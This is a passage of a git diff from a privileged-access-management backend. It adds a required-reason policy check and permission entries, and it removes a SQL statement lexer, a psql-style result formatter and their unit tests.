Buffer cleared.\n", - prompt: "=> ", - shouldClose: false - }; - } - - // Split into complete and incomplete statements - const { complete, remainder } = splitStatements(buffer); - buffer = remainder; - - // Execute each complete statement - let output = ""; - for (const stmt of complete) { - const trimmed = stmt.trim(); - if (trimmed.length > 0) { - // eslint-disable-next-line no-await-in-loop - output += await executeStatement(trimmed); - } - } - - const prompt = buffer.trim().length > 0 ? "-> " : "=> "; - return { output, prompt, shouldClose: false }; - }; - - const clearBuffer = () => { - buffer = ""; - }; - - const getPrompt = () => (buffer.trim().length > 0 ? "-> " : "=> "); - - return { processInput, clearBuffer, getPrompt }; -}; diff --git a/backend/src/ee/services/pam-web-access/pam-web-access-service.ts b/backend/src/ee/services/pam-web-access/pam-web-access-service.ts index 2b8d7476744..f3602979027 100644 --- a/backend/src/ee/services/pam-web-access/pam-web-access-service.ts +++ b/backend/src/ee/services/pam-web-access/pam-web-access-service.ts @@ -16,6 +16,8 @@ import { BadRequestError, NotFoundError, PolicyViolationError } from "@app/lib/e import { GatewayProxyProtocol } from "@app/lib/gateway/types"; import { createGatewayConnection, createRelayConnection, setupRelayServer } from "@app/lib/gateway-v2/gateway-v2"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TApprovalPolicyDALFactory } from "@app/services/approval-policy/approval-policy-dal"; import { ApprovalPolicyType } from "@app/services/approval-policy/approval-policy-enums"; import { APPROVAL_POLICY_FACTORY_MAP } from "@app/services/approval-policy/approval-policy-factory"; @@ -33,6 +35,9 @@ import { TUserDALFactory } from "@app/services/user/user-dal"; import { TPamAccountDALFactory } from "../pam-account/pam-account-dal"; import { 
decryptAccountCredentials } from "../pam-account/pam-account-fns"; +import { TPamAccountPolicyDALFactory } from "../pam-account-policy/pam-account-policy-dal"; +import { PamAccountPolicyRuleType } from "../pam-account-policy/pam-account-policy-enums"; +import { TPolicyRules } from "../pam-account-policy/pam-account-policy-types"; import { TPamResourceDALFactory } from "../pam-resource/pam-resource-dal"; import { decryptResourceConnectionDetails } from "../pam-resource/pam-resource-fns"; import { @@ -64,6 +69,7 @@ const SUPPORTED_WEB_ACCESS_RESOURCES = [PamResource.Postgres, PamResource.SSH, P type TPamWebAccessServiceFactoryDep = { pamAccountDAL: Pick; + pamAccountPolicyDAL: Pick; pamResourceDAL: Pick; permissionService: Pick; auditLogService: Pick; @@ -98,9 +104,11 @@ type THandleWebSocketConnectionDTO = { actorName: string; actorIp: string; actorUserAgent: string; + reason?: string | null; }; export const pamWebAccessServiceFactory = ({ pamAccountDAL, + pamAccountPolicyDAL, pamResourceDAL, permissionService, auditLogService, @@ -160,7 +168,8 @@ export const pamWebAccessServiceFactory = ({ actorEmail, actorName, auditLogInfo, - mfaSessionId + mfaSessionId, + reason }: TIssueWebSocketTicketDTO) => { const account = await pamAccountDAL.findById(accountId); @@ -172,6 +181,12 @@ export const pamWebAccessServiceFactory = ({ throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); } + const trimmedReason = reason?.trim() || null; + + if (!account.resourceId) { + throw new BadRequestError({ message: "Web access is only available for resource-backed accounts" }); + } + const resource = await pamResourceDAL.findById(account.resourceId); if (!resource) { @@ -237,15 +252,32 @@ export const pamWebAccessServiceFactory = ({ ); } + // Reason check is intentionally placed after the approval/permission gates so + // its distinct error code does not leak policy configuration to unauthorized actors. 
+ if (account.policyId) { + const policy = await pamAccountPolicyDAL.findById(account.policyId); + const policyRules = (policy?.rules ?? {}) as TPolicyRules; + if (policy?.isActive && policyRules[PamAccountPolicyRuleType.RequireReason] && !trimmedReason) { + throw new BadRequestError({ + message: "A reason is required to access this account", + name: "PAM_REASON_REQUIRED" + }); + } + } + // MFA check if (account.requireMfa && !mfaSessionId) { - const project = await projectDAL.findById(account.projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(account.projectId), () => + projectDAL.findById(account.projectId) + ); if (!project) throw new NotFoundError({ message: `Project with ID '${account.projectId}' not found` }); const actorUser = await userDAL.findById(actor.id); if (!actorUser) throw new NotFoundError({ message: `User with ID '${actor.id}' not found` }); - const org = await orgDAL.findOrgById(project.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(project.orgId), () => + orgDAL.findOrgById(project.orgId) + ); if (!org) throw new NotFoundError({ message: `Organization with ID '${project.orgId}' not found` }); // Determine which MFA method to use @@ -295,7 +327,8 @@ export const pamWebAccessServiceFactory = ({ accountName: account.name, actorEmail, actorName, - auditLogInfo + auditLogInfo, + reason: trimmedReason }) }); @@ -328,7 +361,8 @@ export const pamWebAccessServiceFactory = ({ actorEmail, actorName, actorIp, - actorUserAgent + actorUserAgent, + reason: accessReason }: THandleWebSocketConnectionDTO): Promise => { let session: { id: string } | null = null; let cleanedUp = false; @@ -420,6 +454,10 @@ export const pamWebAccessServiceFactory = ({ throw new BadRequestError({ message: "Invalid account or project" }); } + if (!account.resourceId) { + throw new BadRequestError({ message: "Web access is only available for resource-backed accounts" }); + } + const resource = await 
pamResourceDAL.findById(account.resourceId); if (!resource) { throw new BadRequestError({ message: "Resource not found" }); @@ -476,7 +514,8 @@ export const pamWebAccessServiceFactory = ({ resourceType: resource.resourceType, accountId: account.id, resourceId: resource.id, - userId + userId, + reason: accessReason?.trim() || null }); await pamSessionExpirationService.scheduleSessionExpiration(session.id, expiresAt); @@ -578,7 +617,8 @@ export const pamWebAccessServiceFactory = ({ accountId, resourceName, accountName, - duration: expiresAt.toISOString() + duration: expiresAt.toISOString(), + reason: accessReason ?? undefined } } }); diff --git a/backend/src/ee/services/pam-web-access/pam-web-access-sql-formatter.test.ts b/backend/src/ee/services/pam-web-access/pam-web-access-sql-formatter.test.ts deleted file mode 100644 index 09e3d72d122..00000000000 --- a/backend/src/ee/services/pam-web-access/pam-web-access-sql-formatter.test.ts +++ /dev/null @@ -1,247 +0,0 @@ -import { builtins } from "pg-types"; -import { describe, expect, it } from "vitest"; - -import { formatCommandResult, formatError, formatTable } from "./pam-web-access-sql-formatter"; - -describe("formatTable", () => { - it("formats a simple two-column result", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 2, - fields: [ - { name: "id", dataTypeID: builtins.INT4 }, - { name: "name", dataTypeID: builtins.TEXT } - ], - rows: [ - { id: 1, name: "Alice" }, - { id: 2, name: "Bob" } - ] - }); - - expect(result).toContain("id"); - expect(result).toContain("name"); - expect(result).toContain("Alice"); - expect(result).toContain("Bob"); - expect(result).toContain("(2 rows)"); - expect(result).toContain("+"); - expect(result).toContain("-"); - }); - - it("right-aligns numeric columns", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 2, - fields: [{ name: "num", dataTypeID: builtins.INT4 }], - rows: [{ num: 1 }, { num: 100 }] - }); - - const lines = 
result.split("\n"); - // Data rows should have right-aligned numbers - const dataLine1 = lines[2]; // first data row - const dataLine2 = lines[3]; // second data row - // "1" should be padded to width of "100" - expect(dataLine1).toContain(" 1"); - expect(dataLine2).toContain("100"); - }); - - it("handles NULL values as empty strings", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 1, - fields: [ - { name: "id", dataTypeID: builtins.INT4 }, - { name: "name", dataTypeID: builtins.TEXT } - ], - rows: [{ id: 1, name: null }] - }); - - expect(result).toContain("(1 row)"); - }); - - it("zero rows with fields", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 0, - fields: [ - { name: "id", dataTypeID: builtins.INT4 }, - { name: "name", dataTypeID: builtins.TEXT } - ], - rows: [] - }); - - expect(result).toContain("id"); - expect(result).toContain("name"); - expect(result).toContain("(0 rows)"); - }); - - it("single row uses singular footer", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "val", dataTypeID: builtins.INT4 }], - rows: [{ val: 42 }] - }); - - expect(result).toContain("(1 row)"); - expect(result).not.toContain("(1 rows)"); - }); - - it("column width matches longest value", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "x", dataTypeID: builtins.TEXT }], - rows: [{ x: "longvalue" }] - }); - - // The separator should be at least as wide as "longvalue" - const lines = result.split("\n"); - const separator = lines[1]; - // "longvalue" is 9 chars, column should be at least 9 + 2 (padding) = 11 - expect(separator.length).toBeGreaterThanOrEqual(11); - }); - - it("formats Date values as ISO-like timestamps", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "created_at", dataTypeID: builtins.TIMESTAMPTZ }], - rows: [{ created_at: new Date("2026-02-05T19:04:52.000Z") }] - }); - - 
expect(result).toContain("2026-02-05 19:04:52"); - expect(result).not.toContain("GMT"); - expect(result).not.toContain("Coordinated Universal Time"); - }); - - it("formats raw string timestamps as-is", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "ts", dataTypeID: builtins.TIMESTAMPTZ }], - rows: [{ ts: "2026-02-05 19:04:52+00" }] - }); - - expect(result).toContain("2026-02-05 19:04:52+00"); - }); - - it("formats Buffer values as hex", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "data", dataTypeID: builtins.BYTEA }], - rows: [{ data: Buffer.from([0xde, 0xad, 0xbe, 0xef]) }] - }); - - expect(result).toContain("\\xdeadbeef"); - }); - - it("formats Array values with braces", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "tags", dataTypeID: 1009 }], - rows: [{ tags: ["a", "b", "c"] }] - }); - - expect(result).toContain("{a,b,c}"); - }); - - it("returns empty string for no fields", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 0, - fields: [], - rows: [] - }); - - expect(result).toBe(""); - }); -}); - -describe("formatCommandResult", () => { - it("INSERT with row count", () => { - const result = formatCommandResult({ - command: "INSERT", - rowCount: 3, - fields: [], - rows: [] - }); - expect(result).toBe("INSERT 0 3\n"); - }); - - it("CREATE TABLE", () => { - const result = formatCommandResult({ - command: "CREATE TABLE", - rowCount: null, - fields: [], - rows: [] - }); - expect(result).toBe("CREATE TABLE\n"); - }); - - it("BEGIN", () => { - const result = formatCommandResult({ - command: "BEGIN", - rowCount: null, - fields: [], - rows: [] - }); - expect(result).toBe("BEGIN\n"); - }); - - it("UPDATE with row count", () => { - const result = formatCommandResult({ - command: "UPDATE", - rowCount: 5, - fields: [], - rows: [] - }); - expect(result).toBe("UPDATE 5\n"); - }); - - it("DELETE with zero 
rows", () => { - const result = formatCommandResult({ - command: "DELETE", - rowCount: 0, - fields: [], - rows: [] - }); - expect(result).toBe("DELETE\n"); - }); -}); - -describe("formatError", () => { - it("formats pg error with message", () => { - const result = formatError({ message: 'relation "nonexistent" does not exist' }); - expect(result).toBe('ERROR: relation "nonexistent" does not exist\n'); - }); - - it("includes DETAIL if present", () => { - const result = formatError({ - message: "duplicate key violation", - detail: "Key (id)=(1) already exists." - }); - expect(result).toContain("ERROR: duplicate key violation\n"); - expect(result).toContain("DETAIL: Key (id)=(1) already exists.\n"); - }); - - it("includes HINT if present", () => { - const result = formatError({ - message: "column does not exist", - hint: 'Perhaps you meant to reference the column "user"."name".' - }); - expect(result).toContain("ERROR: column does not exist\n"); - expect(result).toContain("HINT:"); - }); - - it("handles non-pg errors", () => { - const result = formatError("something went wrong"); - expect(result).toBe("ERROR: something went wrong\n"); - }); - - it("handles null/undefined", () => { - const result = formatError(null); - expect(result).toContain("ERROR:"); - }); -}); diff --git a/backend/src/ee/services/pam-web-access/pam-web-access-sql-formatter.ts b/backend/src/ee/services/pam-web-access/pam-web-access-sql-formatter.ts deleted file mode 100644 index f776b8b53f3..00000000000 --- a/backend/src/ee/services/pam-web-access/pam-web-access-sql-formatter.ts +++ /dev/null @@ -1,119 +0,0 @@ -import { builtins } from "pg-types"; - -// PostgreSQL numeric type OIDs for right-alignment -const NUMERIC_TYPE_IDS = new Set([ - builtins.INT8, - builtins.INT2, - builtins.INT4, - builtins.OID, - builtins.FLOAT4, - builtins.FLOAT8, - builtins.MONEY, - builtins.NUMERIC -]); - -type TQueryResult = { - command: string; - rowCount: number | null; - fields: Array<{ name: string; dataTypeID: 
number }>; - rows: Record[]; -}; - -/** - * Formats a SELECT query result as a psql-style ASCII table. - */ -export const formatTable = (result: TQueryResult): string => { - const { fields, rows } = result; - - if (!fields || fields.length === 0) { - return ""; - } - - // Convert all values to display strings. - // With raw type parsers all values are already strings, but handle - // Date/Buffer/Array defensively in case parsed types slip through. - const displayRows = rows.map((row) => - fields.map((field) => { - const val = row[field.name]; - if (val === null || val === undefined) return ""; - if (val instanceof Date) return val.toISOString().replace("T", " ").replace("Z", "+00"); - if (Buffer.isBuffer(val)) return `\\x${val.toString("hex")}`; - if (Array.isArray(val)) return `{${val.map((v) => String(v ?? "NULL")).join(",")}}`; - return String(val); - }) - ); - - // Calculate column widths: max of header length and all value lengths - const colWidths = fields.map((field, colIdx) => { - let maxLen = field.name.length; - for (const row of displayRows) { - if (row[colIdx].length > maxLen) { - maxLen = row[colIdx].length; - } - } - return maxLen; - }); - - // Determine alignment per column - const isNumeric = fields.map((field) => NUMERIC_TYPE_IDS.has(field.dataTypeID)); - - // Build header row - const headerCells = fields.map((field, i) => ` ${field.name.padEnd(colWidths[i])} `); - const headerLine = headerCells.join("|"); - - // Build separator row - const separatorCells = colWidths.map((w) => "-".repeat(w + 2)); - const separatorLine = separatorCells.join("+"); - - // Build data rows - const dataLines = displayRows.map((row) => { - const cells = row.map((val, i) => { - const padded = isNumeric[i] ? val.padStart(colWidths[i]) : val.padEnd(colWidths[i]); - return ` ${padded} `; - }); - return cells.join("|"); - }); - - // Footer - const rowCount = rows.length; - const footer = `(${rowCount} ${rowCount === 1 ? 
"row" : "rows"})`; - - // Assemble - const parts = [headerLine, separatorLine, ...dataLines, footer, ""]; - return parts.join("\n"); -}; - -/** - * Formats a DML/DDL command result (e.g. "INSERT 0 3", "CREATE TABLE", "BEGIN"). - */ -export const formatCommandResult = (result: TQueryResult): string => { - const { command, rowCount } = result; - if (rowCount != null && rowCount > 0) { - // INSERT returns "INSERT 0 " in psql - if (command === "INSERT") { - return `INSERT 0 ${rowCount}\n`; - } - // UPDATE, DELETE return " " - return `${command} ${rowCount}\n`; - } - return `${command}\n`; -}; - -/** - * Formats a PostgreSQL error in psql style. - */ -export const formatError = (err: unknown): string => { - if (err && typeof err === "object") { - const pgErr = err as { message?: string; detail?: string; hint?: string; severity?: string }; - const parts: string[] = []; - parts.push(`ERROR: ${pgErr.message ?? "Unknown error"}\n`); - if (pgErr.detail) { - parts.push(`DETAIL: ${pgErr.detail}\n`); - } - if (pgErr.hint) { - parts.push(`HINT: ${pgErr.hint}\n`); - } - return parts.join(""); - } - return `ERROR: ${String(err)}\n`; -}; diff --git a/backend/src/ee/services/pam-web-access/pam-web-access-sql-lexer.test.ts b/backend/src/ee/services/pam-web-access/pam-web-access-sql-lexer.test.ts deleted file mode 100644 index 95f827f02c7..00000000000 --- a/backend/src/ee/services/pam-web-access/pam-web-access-sql-lexer.test.ts +++ /dev/null @@ -1,138 +0,0 @@ -import { describe, expect, it } from "vitest"; - -import { splitStatements } from "./pam-web-access-sql-lexer"; - -describe("splitStatements", () => { - // Basic cases - it("single complete statement", () => { - const result = splitStatements("SELECT 1;"); - expect(result.complete).toEqual(["SELECT 1"]); - expect(result.remainder).toBe(""); - }); - - it("multiple statements on one line", () => { - const result = splitStatements("SELECT 1; SELECT 2;"); - expect(result.complete).toEqual(["SELECT 1", " SELECT 2"]); - 
expect(result.remainder).toBe(""); - }); - - it("incomplete statement (no ;)", () => { - const result = splitStatements("SELECT 1"); - expect(result.complete).toEqual([]); - expect(result.remainder).toBe("SELECT 1"); - }); - - it("mixed complete + incomplete", () => { - const result = splitStatements("SELECT 1; SELECT"); - expect(result.complete).toEqual(["SELECT 1"]); - expect(result.remainder).toBe(" SELECT"); - }); - - it("empty statements", () => { - const result = splitStatements(";;;"); - expect(result.complete).toEqual(["", "", ""]); - expect(result.remainder).toBe(""); - }); - - it("multi-line statement", () => { - const result = splitStatements("SELECT *\nFROM users;"); - expect(result.complete).toEqual(["SELECT *\nFROM users"]); - expect(result.remainder).toBe(""); - }); - - // Quoting - it("semicolon inside single quotes", () => { - const result = splitStatements("SELECT 'a;b';"); - expect(result.complete).toEqual(["SELECT 'a;b'"]); - expect(result.remainder).toBe(""); - }); - - it("escaped single quote", () => { - const result = splitStatements("SELECT 'it''s';"); - expect(result.complete).toEqual(["SELECT 'it''s'"]); - expect(result.remainder).toBe(""); - }); - - it("dollar-quoted string", () => { - const result = splitStatements("SELECT $$a;b$$;"); - expect(result.complete).toEqual(["SELECT $$a;b$$"]); - expect(result.remainder).toBe(""); - }); - - it("dollar-quoted with tag", () => { - const result = splitStatements("SELECT $fn$a;b$fn$;"); - expect(result.complete).toEqual(["SELECT $fn$a;b$fn$"]); - expect(result.remainder).toBe(""); - }); - - it("dollar sign not a quote (positional param)", () => { - const result = splitStatements("SELECT $1;"); - expect(result.complete).toEqual(["SELECT $1"]); - expect(result.remainder).toBe(""); - }); - - // Comments - it("line comment with semicolon", () => { - const result = splitStatements("SELECT 1; -- comment;\nSELECT 2;"); - expect(result.complete).toHaveLength(2); - expect(result.complete[0]).toBe("SELECT 
1"); - expect(result.complete[1].trim()).toContain("SELECT 2"); - }); - - it("block comment with semicolon", () => { - const result = splitStatements("SELECT /* ; */ 1;"); - expect(result.complete).toEqual(["SELECT /* ; */ 1"]); - expect(result.remainder).toBe(""); - }); - - it("nested block comments", () => { - const result = splitStatements("SELECT /* /* ; */ */ 1;"); - expect(result.complete).toEqual(["SELECT /* /* ; */ */ 1"]); - expect(result.remainder).toBe(""); - }); - - // Edge cases - it("empty input", () => { - const result = splitStatements(""); - expect(result.complete).toEqual([]); - expect(result.remainder).toBe(""); - }); - - it("only whitespace", () => { - const result = splitStatements(" "); - expect(result.complete).toEqual([]); - expect(result.remainder).toBe(" "); - }); - - it("only semicolons", () => { - const result = splitStatements(";;;"); - expect(result.complete).toEqual(["", "", ""]); - expect(result.remainder).toBe(""); - }); - - it("statement after line comment", () => { - const result = splitStatements("-- comment\nSELECT 1;"); - expect(result.complete).toHaveLength(1); - expect(result.complete[0]).toContain("SELECT 1"); - }); - - it("unclosed single quote keeps everything in remainder", () => { - const result = splitStatements("SELECT 'unclosed;"); - expect(result.complete).toEqual([]); - expect(result.remainder).toBe("SELECT 'unclosed;"); - }); - - it("unclosed block comment keeps everything in remainder", () => { - const result = splitStatements("SELECT /* unclosed ;"); - expect(result.complete).toEqual([]); - expect(result.remainder).toBe("SELECT /* unclosed ;"); - }); - - it("CREATE FUNCTION with dollar-quoted body", () => { - const sql = `CREATE FUNCTION test() RETURNS void AS $$ BEGIN PERFORM 1; END; $$ LANGUAGE plpgsql;`; - const result = splitStatements(sql); - expect(result.complete).toHaveLength(1); - expect(result.complete[0]).toContain("PERFORM 1;"); - expect(result.remainder).toBe(""); - }); -}); diff --git 
a/backend/src/ee/services/pam-web-access/pam-web-access-sql-lexer.ts b/backend/src/ee/services/pam-web-access/pam-web-access-sql-lexer.ts deleted file mode 100644 index 792e2022a7f..00000000000 --- a/backend/src/ee/services/pam-web-access/pam-web-access-sql-lexer.ts +++ /dev/null @@ -1,169 +0,0 @@ -type TSplitResult = { - complete: string[]; - remainder: string; -}; - -enum LexerState { - Normal = "normal", - SingleQuote = "single_quote", - DollarQuote = "dollar_quote", - LineComment = "line_comment", - BlockComment = "block_comment" -} - -/** - * Tries to parse a dollar-quote tag starting at position i. - * Returns the full tag (e.g. "$$" or "$fn$") if found, null otherwise. - */ -const tryParseDollarTag = (sql: string, i: number): string | null => { - // Must start with $ - if (sql[i] !== "$") return null; - - // Check for $$ (empty tag) - if (i + 1 < sql.length && sql[i + 1] === "$") { - return "$$"; - } - - // Check for $identifier$ pattern - // Identifier must start with [A-Za-z_\x80-\xff] - const startChar = i + 1 < sql.length ? sql.charCodeAt(i + 1) : 0; - const isValidStart = - (startChar >= 65 && startChar <= 90) || // A-Z - (startChar >= 97 && startChar <= 122) || // a-z - startChar === 95 || // _ - startChar >= 128; // \x80-\xff - - if (!isValidStart) return null; - - // Scan for the rest of the identifier + closing $ - let j = i + 2; - while (j < sql.length) { - const code = sql.charCodeAt(j); - const isValidContinue = - (code >= 65 && code <= 90) || // A-Z - (code >= 97 && code <= 122) || // a-z - (code >= 48 && code <= 57) || // 0-9 - code === 95 || // _ - code >= 128; // \x80-\xff - - if (code === 36) { - // Found closing $ - return sql.substring(i, j + 1); - } - if (!isValidContinue) { - return null; - } - j += 1; - } - - return null; -}; - -/** - * Splits a SQL string into individual statements by detecting semicolons - * that are actual statement boundaries (not inside strings, comments, etc.). 
- * - * Returns complete statements (terminated by ;) and any remaining text. - */ -export const splitStatements = (sql: string): TSplitResult => { - const complete: string[] = []; - let buffer = ""; - let state = LexerState.Normal; - let dollarTag = ""; - let blockDepth = 0; - let i = 0; - - while (i < sql.length) { - const ch = sql[i]; - const next = i + 1 < sql.length ? sql[i + 1] : ""; - - switch (state) { - case LexerState.Normal: - if (ch === ";") { - complete.push(buffer); - buffer = ""; - } else if (ch === "'") { - buffer += ch; - state = LexerState.SingleQuote; - } else if (ch === "$") { - // Check for dollar-quote tag: $$ or $identifier$ - const tag = tryParseDollarTag(sql, i); - if (tag !== null) { - buffer += tag; - dollarTag = tag; - state = LexerState.DollarQuote; - i += tag.length - 1; // -1 because the loop will i++ - } else { - buffer += ch; - } - } else if (ch === "-" && next === "-") { - buffer += "--"; - state = LexerState.LineComment; - i += 1; - } else if (ch === "/" && next === "*") { - buffer += "/*"; - state = LexerState.BlockComment; - blockDepth = 1; - i += 1; - } else { - buffer += ch; - } - break; - - case LexerState.SingleQuote: - if (ch === "'" && next === "'") { - // Escaped single quote - buffer += "''"; - i += 1; - } else if (ch === "'") { - buffer += ch; - state = LexerState.Normal; - } else { - buffer += ch; - } - break; - - case LexerState.DollarQuote: - // Check if we've hit the closing dollar tag - if (ch === "$" && sql.substring(i, i + dollarTag.length) === dollarTag) { - buffer += dollarTag; - i += dollarTag.length - 1; - state = LexerState.Normal; - } else { - buffer += ch; - } - break; - - case LexerState.LineComment: - buffer += ch; - if (ch === "\n") { - state = LexerState.Normal; - } - break; - - case LexerState.BlockComment: - if (ch === "/" && next === "*") { - buffer += "/*"; - blockDepth += 1; - i += 1; - } else if (ch === "*" && next === "/") { - buffer += "*/"; - blockDepth -= 1; - if (blockDepth === 0) { - state 
= LexerState.Normal; - } - i += 1; - } else { - buffer += ch; - } - break; - - default: - buffer += ch; - } - - i += 1; - } - - return { complete, remainder: buffer }; -}; diff --git a/backend/src/ee/services/pam-web-access/pam-web-access-types.ts b/backend/src/ee/services/pam-web-access/pam-web-access-types.ts index ee7bf4182b0..3e9f487afe7 100644 --- a/backend/src/ee/services/pam-web-access/pam-web-access-types.ts +++ b/backend/src/ee/services/pam-web-access/pam-web-access-types.ts @@ -43,8 +43,10 @@ export const MAX_WEB_SESSIONS_PER_USER = 5; // WebSocket ping interval (ms) β€” keeps ALB from killing idle connections (default 60s timeout) export const WS_PING_INTERVAL_MS = 30000; -// Idle timeout (ms) β€” auto-close sessions with no user input/control messages -export const WS_IDLE_TIMEOUT_MS = 5 * 60 * 1000; +// Idle timeout (ms) β€” auto-close sessions with no inbound WS traffic. The FE +// sends an `activity` heartbeat while its browser tab is visible, so this fires +// only when the tab has been hidden/backgrounded for the full window. 
+export const WS_IDLE_TIMEOUT_MS = 10 * 60 * 1000; export type TSessionContext = { socket: WebSocket; @@ -70,4 +72,5 @@ export type TIssueWebSocketTicketDTO = { actorName: string; auditLogInfo: AuditLogInfo; mfaSessionId?: string; + reason?: string; }; diff --git a/backend/src/ee/services/permission/default-roles.ts b/backend/src/ee/services/permission/default-roles.ts index 797c569af32..d0004d7a464 100644 --- a/backend/src/ee/services/permission/default-roles.ts +++ b/backend/src/ee/services/permission/default-roles.ts @@ -16,6 +16,7 @@ import { ProjectPermissionDynamicSecretActions, ProjectPermissionGroupActions, ProjectPermissionIdentityActions, + ProjectPermissionInsightsActions, ProjectPermissionKmipActions, ProjectPermissionMcpEndpointActions, ProjectPermissionMemberActions, @@ -58,12 +59,14 @@ const buildAdminPermissionRules = () => { ProjectPermissionSub.IpAllowList, ProjectPermissionSub.PkiAlerts, ProjectPermissionSub.PkiCollections, + ProjectPermissionSub.CertificateInventoryViews, ProjectPermissionSub.SshCertificateAuthorities, ProjectPermissionSub.SshCertificates, ProjectPermissionSub.SshCertificateTemplates, ProjectPermissionSub.SshHostGroups, ProjectPermissionSub.PamFolders, ProjectPermissionSub.PamResources, + ProjectPermissionSub.PamDomains, ProjectPermissionSub.McpServers, ProjectPermissionSub.McpActivityLogs ].forEach((el) => { @@ -448,6 +451,8 @@ const buildAdminPermissionRules = () => { can([ProjectPermissionSecretApprovalRequestActions.Read], ProjectPermissionSub.SecretApprovalRequest); + can([ProjectPermissionInsightsActions.Read], ProjectPermissionSub.Insights); + return rules; }; @@ -610,6 +615,15 @@ const buildMemberPermissionRules = () => { can([ProjectPermissionActions.Read], ProjectPermissionSub.PkiAlerts); can([ProjectPermissionActions.Read], ProjectPermissionSub.PkiCollections); + can( + [ + ProjectPermissionActions.Read, + ProjectPermissionActions.Create, + ProjectPermissionActions.Edit, + ProjectPermissionActions.Delete + ], + 
ProjectPermissionSub.CertificateInventoryViews + ); can([ProjectPermissionActions.Read], ProjectPermissionSub.SshCertificates); can([ProjectPermissionActions.Create], ProjectPermissionSub.SshCertificates); @@ -698,6 +712,8 @@ const buildMemberPermissionRules = () => { can([ProjectPermissionActions.Read], ProjectPermissionSub.PamResources); + can([ProjectPermissionActions.Read], ProjectPermissionSub.PamDomains); + can( [ProjectPermissionPamAccountActions.Access, ProjectPermissionPamAccountActions.Read], ProjectPermissionSub.PamAccounts @@ -743,6 +759,7 @@ const buildViewerPermissionRules = () => { can(ProjectPermissionActions.Read, ProjectPermissionSub.IpAllowList); can(ProjectPermissionCertificateAuthorityActions.Read, ProjectPermissionSub.CertificateAuthorities); can(ProjectPermissionCertificateActions.Read, ProjectPermissionSub.Certificates); + can([ProjectPermissionActions.Read], ProjectPermissionSub.CertificateInventoryViews); can(ProjectPermissionPkiTemplateActions.Read, ProjectPermissionSub.CertificateTemplates); can(ProjectPermissionCertificatePolicyActions.Read, ProjectPermissionSub.CertificatePolicies); can(ProjectPermissionCmekActions.Read, ProjectPermissionSub.Cmek); @@ -782,6 +799,8 @@ const buildViewerPermissionRules = () => { can([ProjectPermissionActions.Read], ProjectPermissionSub.PamResources); + can([ProjectPermissionActions.Read], ProjectPermissionSub.PamDomains); + can([ProjectPermissionPamAccountActions.Read], ProjectPermissionSub.PamAccounts); can([ProjectPermissionPamAccountPolicyActions.Read], ProjectPermissionSub.PamAccountPolicies); diff --git a/backend/src/ee/services/permission/org-permission.ts b/backend/src/ee/services/permission/org-permission.ts index ceb2e9683fa..b28bc990c79 100644 --- a/backend/src/ee/services/permission/org-permission.ts +++ b/backend/src/ee/services/permission/org-permission.ts @@ -74,6 +74,14 @@ export enum OrgPermissionGatewayActions { AttachGateways = "attach-gateways" } +export enum 
OrgPermissionGatewayPoolActions { + CreateGatewayPools = "create-gateway-pools", + ListGatewayPools = "list-gateway-pools", + EditGatewayPools = "edit-gateway-pools", + DeleteGatewayPools = "delete-gateway-pools", + AttachGatewayPools = "attach-gateway-pools" +} + export enum OrgPermissionRelayActions { CreateRelays = "create-relays", ListRelays = "list-relays", @@ -141,6 +149,7 @@ export enum OrgPermissionSubjects { AppConnections = "app-connections", Kmip = "kmip", Gateway = "gateway", + GatewayPool = "gateway-pool", Relay = "relay", SecretShare = "secret-share", SubOrganization = "sub-organization", @@ -172,6 +181,7 @@ export type OrgPermissionSet = | [OrgPermissionAuditLogsActions, OrgPermissionSubjects.AuditLogs] | [OrgPermissionActions, OrgPermissionSubjects.ProjectTemplates] | [OrgPermissionGatewayActions, OrgPermissionSubjects.Gateway] + | [OrgPermissionGatewayPoolActions, OrgPermissionSubjects.GatewayPool] | [OrgPermissionRelayActions, OrgPermissionSubjects.Relay] | [ OrgPermissionAppConnectionActions, @@ -330,6 +340,12 @@ export const OrgPermissionSchema = z.discriminatedUnion("subject", [ "Describe what action an entity can take." ) }), + z.object({ + subject: z.literal(OrgPermissionSubjects.GatewayPool).describe("The entity this permission pertains to."), + action: CASL_ACTION_SCHEMA_NATIVE_ENUM(OrgPermissionGatewayPoolActions).describe( + "Describe what action an entity can take." 
+ ) + }), z.object({ subject: z.literal(OrgPermissionSubjects.Relay).describe("The entity this permission pertains to."), action: CASL_ACTION_SCHEMA_NATIVE_ENUM(OrgPermissionRelayActions).describe( @@ -456,6 +472,12 @@ const buildAdminPermission = () => { can(OrgPermissionGatewayActions.DeleteGateways, OrgPermissionSubjects.Gateway); can(OrgPermissionGatewayActions.AttachGateways, OrgPermissionSubjects.Gateway); + can(OrgPermissionGatewayPoolActions.ListGatewayPools, OrgPermissionSubjects.GatewayPool); + can(OrgPermissionGatewayPoolActions.CreateGatewayPools, OrgPermissionSubjects.GatewayPool); + can(OrgPermissionGatewayPoolActions.EditGatewayPools, OrgPermissionSubjects.GatewayPool); + can(OrgPermissionGatewayPoolActions.DeleteGatewayPools, OrgPermissionSubjects.GatewayPool); + can(OrgPermissionGatewayPoolActions.AttachGatewayPools, OrgPermissionSubjects.GatewayPool); + can(OrgPermissionRelayActions.ListRelays, OrgPermissionSubjects.Relay); can(OrgPermissionRelayActions.CreateRelays, OrgPermissionSubjects.Relay); can(OrgPermissionRelayActions.EditRelays, OrgPermissionSubjects.Relay); @@ -526,6 +548,10 @@ const buildMemberPermission = () => { can(OrgPermissionGatewayActions.CreateGateways, OrgPermissionSubjects.Gateway); can(OrgPermissionGatewayActions.AttachGateways, OrgPermissionSubjects.Gateway); + 